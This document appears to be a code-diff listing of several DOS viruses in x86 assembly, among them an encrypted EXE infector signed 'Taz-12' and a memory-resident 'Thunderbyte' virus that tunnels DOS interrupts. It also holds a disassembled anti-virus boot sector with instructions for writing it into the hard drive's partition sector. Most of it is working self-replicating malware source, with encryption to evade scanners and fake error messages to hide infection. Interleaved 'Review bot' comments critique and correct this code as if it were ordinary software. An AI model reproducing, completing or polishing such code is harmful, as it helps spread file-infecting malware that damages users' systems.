||||
int 21h
|
||||
mov bx,offset compare_buf ; Adjust the encryption value
|
||||
mov ah,encrypt_val ; for accurate comparison
|
||||
mov [bx+6],ah
|
||||
mov si,code_start ; One array to compare is this file
|
||||
mov di,offset compare_buf ; The other array is the buffer
|
||||
mov ax,ds ; Transfer the DS register...
|
||||
mov es,ax ; ...to the ES register
|
||||
cld
|
||||
repe cmpsb ; Compare the buffer to the virus
|
||||
jne healthy ; If different, the file is healthy!
|
||||
call close_file ; Close it up otherwise
|
||||
inc files_found ; Chalk up another fucked up file
|
||||
continue_search:
|
||||
mov ah,4fh ; Find next DOS function
|
||||
int 21h ; Try to find another same type file
|
||||
cmp ax,12h ; Are there any more files?
|
||||
je no_more_found ; If not, get outta here
|
||||
jmp find_healthy ; If so, try the process on this one!
|
||||
no_more_found:
|
||||
ret ; Go back to where we came from
|
||||
healthy:
|
||||
mov bx,handle ; Get the file handle
|
||||
mov ah,3eh ; Close it for now
|
||||
int 21h
|
||||
mov ah,3dh ; Open it again, to reset it
|
||||
mov dx,dta+filename
|
||||
mov al,2
|
||||
int 21h
|
||||
mov handle,ax ; Save the handle again
|
||||
call infect_file ; Infect the healthy file
|
||||
call close_file ; Close down this operation
|
||||
inc success ; Indicate we did something this time
|
||||
dec files_infected ; Scratch off another file on agenda
|
||||
jz exit_virus ; If we're through, terminate
|
||||
jmp continue_search ; Otherwise, try another
|
||||
ret
|
||||
close_file:
|
||||
mov bx,handle ; Get the file handle off the stack
|
||||
mov cx,orig_time ; Get the date stamp
|
||||
mov dx,orig_date ; Get the time stamp
|
||||
mov al,1 ; Set file date/time sub-service
|
||||
mov ah,57h ; Get/Set file date and time service
|
||||
int 21h ; Call DOS
|
||||
mov bx,handle
|
||||
mov ah,3eh ; Close handle DOS service
|
||||
int 21h
|
||||
mov cx,orig_attr ; Get the file's original attribute
|
||||
mov al,1 ; Instruct DOS to put it back there
|
||||
mov dx,dta+filename ; Feed it the filename
|
||||
mov ah,43h ; Call DOS
|
||||
int 21h
|
||||
ret
|
||||
exit_virus:
|
||||
cmp files_found,2 ; Are at least 6 files infected?
|
||||
jl print_fake ; If not, keep a low profile
|
||||
cmp success,0 ; Did we infect anything?
|
||||
jg print_fake ; If so, cover it up
|
||||
mov ah,09h ; Use DOS print string service
|
||||
mov dx,offset virus_msg1 ; Load the address of the first line
|
||||
int 21h ; Print it
|
||||
mov dx,offset virus_msg2 ; Load the second line
|
||||
int 21h ; (etc)
|
||||
mov dx,offset virus_msg3
|
||||
int 21h
|
||||
mov dx,offset virus_msg4
|
||||
int 21h
|
||||
mov dx,offset virus_msg5
|
||||
int 21h
|
||||
mov dx,offset virus_msg6
|
||||
int 21h
|
||||
mov dx,offset virus_msg7
|
||||
int 21h
|
||||
mov dx,offset virus_msg8
|
||||
int 21h
|
||||
mov dx,offset virus_msg9
|
||||
int 21h
|
||||
mov dx,offset virus_msg10
|
||||
int 21h
|
||||
mov dx,offset virus_msg11
|
||||
int 21h
|
||||
mov dx,offset virus_msg12
|
||||
int 21h
|
||||
mov dx,offset virus_msg13
|
||||
int 21h
|
||||
mov dx,offset virus_msg14
|
||||
int 21h
|
||||
mov dx,offset virus_msg15
|
||||
int 21h
|
||||
mov dx,offset virus_msg16
|
||||
int 21h
|
||||
mov dx,offset virus_msg17
|
||||
int 21h
|
||||
mov dx,offset virus_msg18
|
||||
int 21h
|
||||
mov dx,offset virus_msg19
|
||||
int 21h
|
||||
mov dx,offset virus_msg20
|
||||
int 21h
|
||||
mov dx,offset virus_msg21
|
||||
int 21h
|
||||
mov dx,offset virus_msg22
|
||||
int 21h
|
||||
mov dx,offset virus_msg23
|
||||
int 21h
|
||||
jmp terminate
|
||||
print_fake:
|
||||
mov ah,09h ; Use DOS to print fake error message
|
||||
mov dx,offset fake_msg
|
||||
int 21h
|
||||
terminate:
|
||||
mov ah,4ch ; DOS terminate process function
|
||||
int 21h ; Call DOS to get out of this program
|
||||
|
||||
filler db 8 dup (90h) ; Pad out the file length to 666 bytes
|
||||
|
||||
main endp
|
||||
code ends
|
||||
end main
|
|
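Review bot: The comments on `mov cx,orig_time` (L9168, "Get the date stamp") and `mov dx,orig_date` (L9171, "Get the time stamp") are swapped relative to the code: DOS function 57h sub-function 1 takes the time in CX and the date in DX, so the instructions are consistent and only the two comments are wrong, e.g. `mov cx,orig_time ; Time stamp goes in CX for 5701h` and `mov dx,orig_date ; Date stamp goes in DX`. The same kind of stale wording appears at L9213, where `cmp files_found,2` is commented "Are at least 6 files infected?", and at L9392, where the `filler` comment speaks of a 666-byte file while `virus_size` at L8592 is 2276; both look like leftovers from earlier values and should be corrected or dropped. `main` spans the whole section, so these are all inside one procedure.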
@ -0,0 +1,252 @@
|
|||
cseg segment byte public 'code'
|
||||
assume cs:cseg, ds:cseg
|
||||
|
||||
org 100h
|
||||
|
||||
start_of_virus:
|
||||
|
||||
call get_offset
|
||||
get_offset: ;alternative way to get the delta
|
||||
mov di,sp ;offset without activating any flags in
|
||||
mov bp,word ptr ss:[di] ;TB-scan
|
||||
sub bp,offset get_offset
|
||||
inc sp
|
||||
inc sp
|
||||
|
||||
push ds ;save es & ds
|
||||
push es
|
||||
push cs ;and point ds to code segment
|
||||
pop ds
|
||||
|
||||
call encrypt_decrypt ;decrypt contents of file
|
||||
|
||||
start_of_encryption:
|
||||
cld ;clear direction flag
|
||||
|
||||
mov ah,1ah ;set new dta area
|
||||
lea dx,[bp+dta_area]
|
||||
int 21h
|
||||
|
||||
mov bx,es
|
||||
push cs ;es points to code segment
|
||||
pop es
|
||||
|
||||
lea si,[bp+return2_buffer] ;this code prepares the return code
|
||||
lea di,[bp+return_buffer]
|
||||
movsw ;transfer buffer contents
|
||||
lodsw
|
||||
add ax,bx ;bx holds start es = psp
|
||||
add ax,10h
|
||||
stosw
|
||||
|
||||
; lea di,[bp+stack_return]
|
||||
; lea si,[bp+stack_save] ;si already points to stack_save
|
||||
add di,8 ;saving a byte with this code
|
||||
lodsw ;prepares the restore of ss/sp
|
||||
add ax,bx
|
||||
add ax,10h
|
||||
stosw
|
||||
movsw
|
||||
|
||||
|
||||
mov ah,47h ;save starting directory
|
||||
xor dl,dl
|
||||
lea si,[bp+save_dir]
|
||||
int 21h
|
||||
|
||||
find_new_files: ;start finding files
|
||||
mov ah,4eh
|
||||
mov cx,7
|
||||
lea dx,[bp+search_pattern]
|
||||
find_files:
|
||||
int 21h
|
||||
|
||||
jnc open_file ;if found a file
|
||||
lea dx,[bp+dir_mask] ;else change directory
|
||||
mov ah,3bh
|
||||
int 21h
|
||||
jnc find_new_files
|
||||
jmp no_more_files ;end of all files
|
||||
|
||||
open_file: ;open the found file
|
||||
mov ax,3d02h
|
||||
lea dx,[bp+dta_area+1eh]
|
||||
int 21h
|
||||
|
||||
xchg ax,bx ;file handle in bx
|
||||
|
||||
mov ah,3fh ;read the exe header to exe_header
|
||||
mov cx,18h
|
||||
lea dx,[bp+exe_header]
|
||||
int 21h
|
||||
|
||||
lea si,[bp+exe_header] ;check if it's really a executable
|
||||
lodsw
|
||||
cmp ax,'ZM'
|
||||
je check_infected
|
||||
cmp ax,'MZ'
|
||||
je check_infected
|
||||
jmp no_exe ;else jump
|
||||
|
||||
check_infected:
|
||||
|
||||
add si,10h ;saving another byte
|
||||
; lea si,[bp+exe_header+12h]
|
||||
lodsw
|
||||
cmp ax,'Ri' ;is it already infected?
|
||||
jne start_infect
|
||||
jmp already_infected
|
||||
|
||||
|
||||
start_infect:
|
||||
lea di,[bp+return2_buffer] ;put the files ip/cs in return2_buffer
|
||||
movsw
|
||||
movsw
|
||||
|
||||
lea si,[bp+exe_header+0eh] ;save the files ss/sp in stack_save
|
||||
movsw
|
||||
movsw
|
||||
|
||||
lea di,[bp+exe_header+12h] ;mark the file infected
|
||||
mov ax,'Ri'
|
||||
stosw
|
||||
|
||||
mov al,2 ;go to end_of_file
|
||||
call go_eof ;dx/ax is file length at return
|
||||
|
||||
mov cx,10h ;use div to save bytes instead of speed
|
||||
div cx
|
||||
sub ax,word ptr ds:[bp+exe_header+8]
|
||||
xchg dx,ax
|
||||
stosw ;put new ip/cs in exe_header
|
||||
xchg dx,ax
|
||||
stosw
|
||||
|
||||
inc ax ;put new suitable ss/sp in exe_header
|
||||
inc ax
|
||||
mov word ptr [bp+exe_header+0eh],ax
|
||||
mov word ptr [bp+exe_header+10h],4b0h
|
||||
|
||||
|
||||
mov ah,2ch ;get system time for random number
|
||||
int 21h
|
||||
xor dh,dh ;just alter the code a little bit
|
||||
or dl,00001010b ;with encryption so TB-scan wont't
|
||||
mov word ptr [bp+encryption_value],dx ;find garbage instruction
|
||||
|
||||
mov ah,40h ;prepare to append virus to file
|
||||
lea dx,[bp+start_of_virus]
|
||||
call append_virus ;call it
|
||||
|
||||
mov al,2 ;go to end of file
|
||||
call go_eof
|
||||
|
||||
mov cx,512 ;get filesize in 512 modules
|
||||
div cx
|
||||
inc ax
|
||||
mov word ptr [bp+exe_header+2],dx ;put modulo/filesize in
|
||||
mov word ptr [bp+exe_header+4],ax ;exe header
|
||||
|
||||
|
||||
xor al,al ;go to beginning of file
|
||||
call go_eof
|
||||
|
||||
mov ah,40h ;write new exe header
|
||||
mov cx,18h
|
||||
lea dx,[bp+exe_header]
|
||||
int 21h
|
||||
|
||||
lea si,[bp+dta_area+16h] ;restore time/date stamp
|
||||
mov cx,word ptr [si]
|
||||
mov dx,word ptr [si+2]
|
||||
mov ax,5701h
|
||||
int 21h
|
||||
|
||||
already_infected:
|
||||
no_exe:
|
||||
|
||||
mov ah,3eh ;close file
|
||||
int 21h
|
||||
|
||||
mov ax,4301h ;restore file attribute
|
||||
mov cl,byte ptr [bp+dta_area+15h]
|
||||
lea dx,[bp+dta_area+1eh]
|
||||
int 21h
|
||||
|
||||
mov ah,4fh ;find next file
|
||||
jmp find_files
|
||||
|
||||
no_more_files:
|
||||
|
||||
lea dx,[bp+save_dir] ;restore starting directory
|
||||
mov ah,3bh
|
||||
int 21h
|
||||
|
||||
pop es ;shrink memory block
|
||||
mov ah,4ah
|
||||
mov bx,10000
|
||||
int 21h
|
||||
push es
|
||||
|
||||
mov ah,48h ;allocate a new 3k block
|
||||
mov bx,192
|
||||
int 21h
|
||||
jc no_mem
|
||||
dec ax
|
||||
mov es,ax
|
||||
mov word ptr es:[1],0008h ;mark DOS as owner and it will
|
||||
no_mem: ;reduce available memory to DOS
|
||||
|
||||
pop es ;restore old es/ds
|
||||
pop ds
|
||||
|
||||
cli ;must use this before altering ss/sp
|
||||
mov ss,word ptr cs:[bp+stack_return] ;put back original ss/sp
|
||||
mov sp,word ptr cs:[bp+stack_return+2]
|
||||
sti ;interrupts allowed again
|
||||
|
||||
end_part:
|
||||
db 0eah ;jmp to original ip
|
||||
return_buffer db 0,0,0,0
|
||||
return2_buffer dw 0,0fff0h ;code for carrier file to exit
|
||||
stack_save dd ?
|
||||
stack_return dd ?
|
||||
dir_mask db '..',0
|
||||
search_pattern db '*.exe',0
|
||||
signature db "Taz-12 (C) 94 by Sector Infector!"
|
||||
go_eof: ;procedure to go to beginning and
|
||||
mov ah,42h ;end of file
|
||||
xor cx,cx ;this saves a few bytes as it's
|
||||
cwd ;used a few times
|
||||
int 21h
|
||||
ret
|
||||
end_of_encryption:
|
||||
pad db 0 ;pad out a byte so first byte of
|
||||
;encryption value won't be overwritten
|
||||
encryption_value dw 0
|
||||
|
||||
encrypt_decrypt: ;cryptation routine
|
||||
mov si,word ptr [bp+encryption_value]
|
||||
lea di,[bp+start_of_encryption]
|
||||
mov cx,(end_of_encryption-start_of_encryption+1)/2
|
||||
crypt_loop:
|
||||
xor word ptr [di],si
|
||||
inc di
|
||||
inc di
|
||||
loop crypt_loop
|
||||
ret
|
||||
|
||||
append_virus:
|
||||
call encrypt_decrypt ;encrypt virus before write
|
||||
mov cx,end_of_virus-start_of_virus ;cx is length of virus
|
||||
int 21h ;call 40h
|
||||
call encrypt_decrypt ;decrypt virus again
|
||||
ret
|
||||
end_of_virus:
|
||||
exe_header db 18h dup(?) ;don't need to copy this shit
|
||||
dta_area db 43 dup(?) ;to the next file to infect
|
||||
save_dir db 64 dup(?) ;return adress is already saved!
|
||||
cseg ends
|
||||
end start_of_virus
|
||||
|
||||
|
|
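Review bot: Commented-out instructions are left in place of explanation at L9522-L9525 and again at L9668 ("saving a byte"), which makes the reader reconstruct the pointer arithmetic to see why the shortcut is valid. From the `movsw`/`lodsw`/`stosw` sequence at L9505-L9517 and the layout at L9989-L9998, DI is `return2_buffer` and SI is `stack_save` at that point, so a plain invariant comment would serve better than dead code, e.g. `add di,8 ; di == return2_buffer here, +8 lands on stack_return; si already == stack_save`. Likewise L9668 could state `; si == exe_header+2 after the lodsw above, +10h reaches offset 12h`. The run from `start_of_virus` to `end_of_virus` has no header comment naming the assumptions it relies on (BP as delta offset, ES = PSP on entry), which is the one piece of documentation this file most needs.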
@ -0,0 +1,171 @@
|
|||
;This is a disassembly of Thunderbyte's anti-viral partition code.
|
||||
;An org statement was not used because it appears that all offsets used
|
||||
;herein are either relative or absolute, i.e. it just doesn't matter.
|
||||
;This should be compiled as a binary image file, it *WILL NOT* create
|
||||
;an executable file. This code is exactly 512 bytes long and should be
|
||||
;implanted into the hard drive at physical sector 1, cylinder 0, head 0
|
||||
;using the BIOS direct write to disk function. *DO NOT* use DOS write to
|
||||
;disk functions or DEBUG because these functions can't access hidden sectors
|
||||
;and you'll probably just overwrite the disk drive.
|
||||
|
||||
;have fun, folks!
|
||||
|
||||
code_start:
|
||||
|
||||
cli ;no interrupts
|
||||
xor cx, cx
|
||||
mov ss, cx
|
||||
mov sp, 7c00h
|
||||
mov si, sp
|
||||
sti
|
||||
cld
|
||||
|
||||
mov es, cx ;cs already equals 0
|
||||
mov ds, cx
|
||||
|
||||
mov di, 0600h ;
|
||||
|
||||
mov ch, 01 ;cx = 100h
|
||||
repz movsw ;mov 200h bytes from 0000:7c00h to 0000:0600h
|
||||
;to make room for boot sector
|
||||
|
||||
jump_pt db 0e9h, 00, 8ah ;this will act like far jmp to first_pt label
|
||||
;i.e. 0000:061ah, wraps around segment
|
||||
first_pt: ;when execution continues, this will be offset
|
||||
;061ah here
|
||||
mov si, 06ddh
|
||||
call routine_1
|
||||
mov si, 07eeh
|
||||
call routine_2
|
||||
mov bp, si
|
||||
mov si, 0733h
|
||||
jb second_pt
|
||||
|
||||
mov bx, sp ;buffer at stack pointer (7c00h?)
|
||||
mov ax, 0201h ;func 2, 1 sector - possibily boot sector?
|
||||
int 13h ;BIOS read sector
|
||||
|
||||
mov si, 0725h
|
||||
second_pt:
|
||||
jb sixth_pt
|
||||
|
||||
mov si, 745h
|
||||
call routine_1
|
||||
call routine_1
|
||||
|
||||
mov si, 7c40h
|
||||
mov cx, 01c0h
|
||||
loop_1:
|
||||
xchg ax, bx
|
||||
shl bx, 1
|
||||
lodsb ;from 0000:7c40h
|
||||
add ax, bx
|
||||
mov ah, bh
|
||||
test ah, ah
|
||||
jns third_pt
|
||||
xor ax, 0a097h
|
||||
third_pt:
|
||||
loop loop_1
|
||||
|
||||
cmp ax, 7805h
|
||||
jnz fourth_pt
|
||||
mov si, 0740h
|
||||
call routine_1
|
||||
|
||||
mov si, 0762h
|
||||
call 01cdh
|
||||
mov dx, [si + 0fc9fh]
|
||||
cmp dx, 27eh
|
||||
jb fourth_pt
|
||||
|
||||
mov si, 740h
|
||||
call routine_1
|
||||
mov si, 774h
|
||||
call routine_1
|
||||
|
||||
les ax, [004c]
|
||||
mov bx, es
|
||||
mov cl, 04
|
||||
shr ax, cl
|
||||
add ax, bx
|
||||
inc cx
|
||||
inc cx
|
||||
shl dx, cl
|
||||
cmp ax, dx
|
||||
jnb fifth_pt
|
||||
|
||||
fourth_pt:
|
||||
mov si, 0787h
|
||||
call routine_1
|
||||
int 16h
|
||||
mov si, 783h
|
||||
or al, 20h
|
||||
cmp al, 79h
|
||||
jnz seventh_pt
|
||||
|
||||
fifth_pt:
|
||||
call routine_1
|
||||
mov si, bp
|
||||
mov dx, [si]
|
||||
jmp sp ;control goes to boot sector
|
||||
|
||||
sixth_pt:
|
||||
call routine_1
|
||||
int 16h
|
||||
|
||||
seventh_pt:
|
||||
int 18h ;rom BASIC!
|
||||
|
||||
eighth_pt:
|
||||
jmp eighth_pt ;infinite loop Lock Up!
|
||||
|
||||
|
||||
routine_2:
|
||||
lea di, [si - 30h]
|
||||
boot_chk:
|
||||
cmp byte ptr [si], 80h ;looks like check for bootable parttn
|
||||
jz bootable
|
||||
sub si, 10h
|
||||
cmp si, di
|
||||
jnb boot_chk
|
||||
ret
|
||||
bootable:
|
||||
mov dx, [si]
|
||||
mov cx, [si + 2]
|
||||
return_pt:
|
||||
ret
|
||||
|
||||
routine_1:
|
||||
lodsb
|
||||
cbw ;convert to word
|
||||
test ax, ax ;huh?
|
||||
jz return_pt ;like ret to original caller
|
||||
|
||||
mov ah, 0eh
|
||||
xor bx, bx
|
||||
push si
|
||||
int 10h
|
||||
pop si
|
||||
jmp routine_1
|
||||
|
||||
code_end:
|
||||
|
||||
msg1 db 13, 10, "Thunderbyte anti-virus partition "
|
||||
db "v6.24 (C) 1993-94 Thunderbyte BV.", 13, 10, 10, 0
|
||||
msg2 db "Disk error!", 13, 10, 00
|
||||
msg3 db "No system!", 13, 10, 00
|
||||
msg4 db "OK!", 13, 10,"Checking ",0
|
||||
msg5 db "bootsector CRC -> ",0
|
||||
msg6 db "available RAM -> ",0
|
||||
msg7 db "INT 13h -> ",0
|
||||
msg8 db "OK!",13, 10, 10, 0
|
||||
msg9 db "Failed!", 13, 10, "System might be infected. Continue? (N/Y)", 07, 0
|
||||
|
||||
misc db 0, 0, 0, 80h, 01h, 01, 0, 06, 0dh, 0feh, 0f8h
|
||||
db 03eh, 0, 0, 0, 06h, 78h, 0dh, 0, 0, 0
|
||||
db 10h dup(0)
|
||||
db 10h dup(0)
|
||||
db 0eh dup(0)
|
||||
|
||||
id_sig db 55h, 0aah
|
||||
|
|
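Review bot: `les ax, [004c]` at L10357 has no radix suffix, so a MASM-style assembler will reject `4c` as a decimal literal; the surrounding message "INT 13h -> " (L10568) and the `shr ax,cl`/`add ax,bx` normalisation suggest the INT 13h vector at 0000:004Ch is meant, i.e. `les ax, [004ch] ;INT 13h vector (0000:004Ch) for the hook check`. The `call 01cdh` at L10329 and `mov dx, [si + 0fc9fh]` at L10332 look like unresolved disassembly artifacts: every other target in the file is either a label or an absolute address inside the relocated 0600h image, and a near call to 01cdh would not land there, so those two lines should be re-resolved or at least flagged with a comment that they are unverified. The header claim at L10120-L10123 that the origin "just doesn't matter" only holds if such absolute references are confirmed.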
@ -0,0 +1,612 @@
|
|||
;*****************************************************************************;
|
||||
; ;
|
||||
; Tunderbyte Virus ;
|
||||
; ;
|
||||
; TBSCAN.DAT : DB3F00807609??4D75F9 ;
|
||||
; ;
|
||||
;*****************************************************************************;
|
||||
|
||||
virus segment public 'code'
|
||||
assume cs:virus, ds:virus, es:virus
|
||||
org 0
|
||||
|
||||
VirusStart equ $
|
||||
VirusSize1 equ (VirusEnd1-$)
|
||||
VirusSize2 equ (VirusEnd2-$)
|
||||
|
||||
Decrypt1: db 0bdh,StartEncrypt-Decrypt2,0
|
||||
db 80h,76h,Decrypt2-VirusStart-1,0
|
||||
db 4dh,75h,-7
|
||||
Decrypt2: cli
|
||||
mov sp,offset DoAgain-2
|
||||
ret -8
|
||||
|
||||
db 0,0,0,0,'***** THUNDERBYTE *****',0,0,0,0
|
||||
|
||||
Init: mov cx,(VirusEnd1-StartEncrypt+1)/2
|
||||
mov dl,byte ptr cs:Decrypt1[6]
|
||||
mov dh,dl
|
||||
mov si,offset StartEncrypt
|
||||
NotReady: ret 2
|
||||
|
||||
DecryptWord: mov ax,ss:[si]
|
||||
xor cs:[si],dx
|
||||
NextWord: add dx,ax
|
||||
inc si
|
||||
ret -4
|
||||
|
||||
dw DecryptWord
|
||||
dw DoAgain
|
||||
dw NextWord
|
||||
dw Init
|
||||
DoAgain: loop NotReady
|
||||
|
||||
StartEncrypt equ $
|
||||
|
||||
Main: mov sp,1000h
|
||||
sti
|
||||
push ds
|
||||
push es
|
||||
mov ax,03031h
|
||||
mov bx,0DEADh
|
||||
int 21h
|
||||
cmp ax,0DEADh
|
||||
jne Install
|
||||
jmp Exit
|
||||
Install: push es
|
||||
mov ah,52h
|
||||
int 21h
|
||||
mov ax,es:[bx-2]
|
||||
mov cs:FirstMCB,ax
|
||||
pop es
|
||||
CheckBlock: mov ds,ax
|
||||
inc ax
|
||||
cmp word ptr ds:[1],ax
|
||||
jne NextBlock
|
||||
cmp word ptr ds:[3],((VirusSize2+0fh)/10h)+((VirusSize1+0fh)/10h)
|
||||
jne NextBlock
|
||||
push ax
|
||||
push es
|
||||
mov cx,VirusSize2
|
||||
xor di,di
|
||||
mov es,ax
|
||||
mov al,es:[di]
|
||||
cld
|
||||
repe scasb
|
||||
pop es
|
||||
pop ax
|
||||
je CopyVirus
|
||||
NextBlock: add ax,ds:[3]
|
||||
cmp byte ptr ds:[0],'Z'
|
||||
jne CheckBlock
|
||||
mov ah,4ah
|
||||
mov bx,-1
|
||||
int 21h
|
||||
mov ah,4ah
|
||||
sub bx,((VirusSize2+0fh)/10h)+((VirusSize1+0fh)/10h)+1
|
||||
int 21h
|
||||
mov ah,48h
|
||||
mov bx,((VirusSize2+0fh)/10h)+((VirusSize1+0fh)/10h)
|
||||
int 21h
|
||||
CopyVirus: push cs
|
||||
pop ds
|
||||
dec ax
|
||||
mov es,ax
|
||||
inc ax
|
||||
mov es:[1],ax
|
||||
mov cx,8
|
||||
mov si,offset CommandStr
|
||||
mov di,cx
|
||||
cld
|
||||
rep movsb
|
||||
mov es,ax
|
||||
EncryptZero: inc byte ptr ds:Decrypt1[6]
|
||||
jz EncryptZero
|
||||
mov cx,VirusSize2
|
||||
xor si,si
|
||||
xor di,di
|
||||
cld
|
||||
rep movsb
|
||||
push es
|
||||
call ReturnFar
|
||||
xor ax,ax
|
||||
mov ds,ax
|
||||
cli
|
||||
mov ax,offset DebugWatch
|
||||
xchg ax,ds:[20h]
|
||||
mov cs:OldInt8o,ax
|
||||
mov ax,cs
|
||||
xchg ax,ds:[22h]
|
||||
mov cs:OldInt8s,ax
|
||||
sti
|
||||
push ds:[4]
|
||||
push ds:[6]
|
||||
mov word ptr ds:[4],offset Trace1
|
||||
mov word ptr ds:[6],cs
|
||||
pushf
|
||||
push cs
|
||||
mov ax,offset Return4
|
||||
push ax
|
||||
cli
|
||||
pushf
|
||||
pop ax
|
||||
or ax,100h
|
||||
push ax
|
||||
push ds:[86h]
|
||||
push ds:[84h]
|
||||
mov ah,52h
|
||||
Trace1: push bp
|
||||
mov bp,sp
|
||||
push ax
|
||||
push ds
|
||||
push cs
|
||||
pop ds
|
||||
mov ax,FirstMCB
|
||||
cmp [bp+4],ax
|
||||
jae Return1
|
||||
mov ax,[bp-2]
|
||||
mov RegAX,ax
|
||||
mov RegSP,bp
|
||||
mov ax,[bp+2]
|
||||
mov OldInt21o,ax
|
||||
mov ax,[bp+4]
|
||||
mov OldInt21s,ax
|
||||
xor ax,ax
|
||||
mov ds,ax
|
||||
mov word ptr ds:[4],offset Trace2
|
||||
mov word ptr ds:[6],cs
|
||||
jmp short Trace3
|
||||
Return1: jmp short Return3
|
||||
Trace2: push bp
|
||||
mov bp,sp
|
||||
push ax
|
||||
push ds
|
||||
cmp ax,cs:RegAX
|
||||
jne Return3
|
||||
cmp bp,cs:RegSP
|
||||
jne Return3
|
||||
Trace3: push bx
|
||||
push dx
|
||||
lds bx,[bp+2]
|
||||
mov al,[bx]
|
||||
mov dx,[bx+1]
|
||||
inc dx
|
||||
cmp al,0e9h
|
||||
je JumpOpcode
|
||||
cmp al,0e8h
|
||||
je CallOpcode
|
||||
xchg ax,dx
|
||||
dec ax
|
||||
cbw
|
||||
xchg ax,dx
|
||||
cmp al,0ebh
|
||||
je JumpOpcode
|
||||
cmp al,70h
|
||||
jb Return2
|
||||
cmp al,7fh
|
||||
ja Return2
|
||||
JumpOpcode: push ax
|
||||
push ds
|
||||
xor ax,ax
|
||||
mov ds,ax
|
||||
mov word ptr ds:[0c8h],offset HackJump
|
||||
mov word ptr ds:[0cah],cs
|
||||
jmp short Continue
|
||||
CallOpcode: push ax
|
||||
push ds
|
||||
xor ax,ax
|
||||
mov ds,ax
|
||||
mov word ptr ds:[0c8h],offset HackCall
|
||||
mov word ptr ds:[0cah],cs
|
||||
Continue: pop ds
|
||||
pop ax
|
||||
mov cs:Displacement,dx
|
||||
mov cs:Opcode,al
|
||||
mov ax,32cdh
|
||||
xchg ax,[bx]
|
||||
mov cs:SavedCode,ax
|
||||
mov cs:HackOffset,bx
|
||||
mov cs:HackSegment,ds
|
||||
and word ptr [bp+6],0feffh
|
||||
Return2: pop dx
|
||||
pop bx
|
||||
Return3: pop ds
|
||||
pop ax
|
||||
pop bp
|
||||
iret
|
||||
Return4: pop ds:[6]
|
||||
pop ds:[4]
|
||||
mov cs:Handle,0
|
||||
Exit: pop es
|
||||
pop ds
|
||||
mov ax,ds
|
||||
add ax,10h
|
||||
add cs:OldCS,ax
|
||||
add ax,cs:OldSP
|
||||
mov dx,cs:OldSP
|
||||
cli
|
||||
mov ss,ax
|
||||
mov sp,dx
|
||||
sti
|
||||
jmp cs:OldEntry
|
||||
|
||||
ReturnFar: retf
|
||||
|
||||
OldEntry equ this dword
|
||||
OldIP dw 0
|
||||
OldCS dw -10h
|
||||
OldSP dw 1000h
|
||||
OldSS dw 0
|
||||
|
||||
HackAddress equ this dword
|
||||
HackOffset dw ?
|
||||
HackSegment dw ?
|
||||
SavedCode dw ?
|
||||
|
||||
HackJump: call Interrupt21
|
||||
push bp ; simulate a conditional or
|
||||
push ax ; unconditional jump
|
||||
mov bp,sp
|
||||
mov ax,[bp+8]
|
||||
and ax,0fcffh
|
||||
push ax
|
||||
db 0b8h ; mov ax,????
|
||||
Displacement dw 0
|
||||
popf
|
||||
Opcode db 0ebh,3,0 ; j?? +3
|
||||
xor ax,ax
|
||||
nop
|
||||
add [bp+4],ax
|
||||
pop ax
|
||||
pop bp
|
||||
iret
|
||||
|
||||
HackCall: call Interrupt21
|
||||
sub sp,2 ; simulate a call
|
||||
push bp
|
||||
mov bp,sp
|
||||
push ax
|
||||
mov ax,[bp+4]
|
||||
inc ax
|
||||
xchg ax,[bp+8]
|
||||
xchg ax,[bp+6]
|
||||
xchg ax,[bp+4]
|
||||
add ax,cs:Displacement
|
||||
mov [bp+2],ax
|
||||
pop ax
|
||||
pop bp
|
||||
iret
|
||||
|
||||
Seek: mov ah,42h
|
||||
xor cx,cx
|
||||
xor dx,dx
|
||||
|
||||
Dos: pushf
|
||||
db 9ah
|
||||
OldInt21o dw ?
|
||||
OldInt21s dw ?
|
||||
ret
|
||||
|
||||
DosVersion: cmp ax,3031h
|
||||
jne NotTByte
|
||||
cmp bx,0DEADh
|
||||
jne NotTByte
|
||||
mov ax,0DEADh
|
||||
add sp,8
|
||||
iret
|
||||
|
||||
Interrupt21: cmp ah,30h
|
||||
je DosVersion
|
||||
push si
|
||||
push ds
|
||||
push cs:SavedCode
|
||||
lds si,cs:HackAddress
|
||||
pop ds:[si]
|
||||
pop ds
|
||||
pop si
|
||||
push ax
|
||||
push bx
|
||||
push cx
|
||||
push dx
|
||||
push si
|
||||
push di
|
||||
push bp
|
||||
push ds
|
||||
push es
|
||||
cmp ah,3eh
|
||||
je CloseFile
|
||||
cmp ah,40h
|
||||
je WriteFile
|
||||
Old21: pop es
|
||||
pop ds
|
||||
pop bp
|
||||
pop di
|
||||
pop si
|
||||
pop dx
|
||||
pop cx
|
||||
pop bx
|
||||
pop ax
|
||||
push si
|
||||
push ds
|
||||
lds si,cs:HackAddress
|
||||
mov word ptr ds:[si],32cdh
|
||||
pop ds
|
||||
pop si
|
||||
NotTByte: ret
|
||||
|
||||
WriteFile: mov ax,4400h
|
||||
call Dos
|
||||
cmp dl,7fh
|
||||
ja Error1
|
||||
mov al,1
|
||||
call Seek
|
||||
jc Error1
|
||||
or dx,dx
|
||||
jnz Error1
|
||||
cmp ax,17h
|
||||
ja Error1
|
||||
push cs
|
||||
pop es
|
||||
mov si,dx
|
||||
mov di,offset Signature
|
||||
add di,ax
|
||||
cmp word ptr [si],"ZM"
|
||||
jne Error1
|
||||
cmp word ptr [si+12h],0DEADh
|
||||
je Error1
|
||||
cmp cx,18h
|
||||
jb CheckHandle
|
||||
or ax,ax
|
||||
jz Ok
|
||||
CheckHandle: cmp bx,cs:Handle
|
||||
jne Error1
|
||||
Ok: add cx,ax
|
||||
cmp cx,18h
|
||||
jbe CountOk
|
||||
mov cx,18h
|
||||
CountOk: sub cx,ax
|
||||
jbe Error1
|
||||
cld
|
||||
rep movsb
|
||||
mov cs:Handle,bx
|
||||
Error1: jmp Old21
|
||||
|
||||
CloseFile: push cs
|
||||
pop ds
|
||||
push cs
|
||||
pop es
|
||||
mov ax,4400h
|
||||
call Dos
|
||||
test dl,80h
|
||||
jne Error1
|
||||
or bx,bx
|
||||
je Read
|
||||
cmp cs:Handle,bx
|
||||
je DoNotRead
|
||||
Read: xor al,al
|
||||
call Seek
|
||||
jc Error1
|
||||
mov ah,3fh
|
||||
mov cx,18h
|
||||
mov dx,offset Signature
|
||||
call Dos
|
||||
jc Error1
|
||||
DoNotRead: mov cs:Handle,0
|
||||
cmp Signature,"ZM"
|
||||
jne Error1
|
||||
cmp ChkSum,0DEADh
|
||||
je Error1
|
||||
mov ax,ExeIP
|
||||
mov OldIP,ax
|
||||
mov ax,ExeCS
|
||||
mov OldCS,ax
|
||||
mov ax,ExeSS
|
||||
mov OldSS,ax
|
||||
mov ax,ExeSP
|
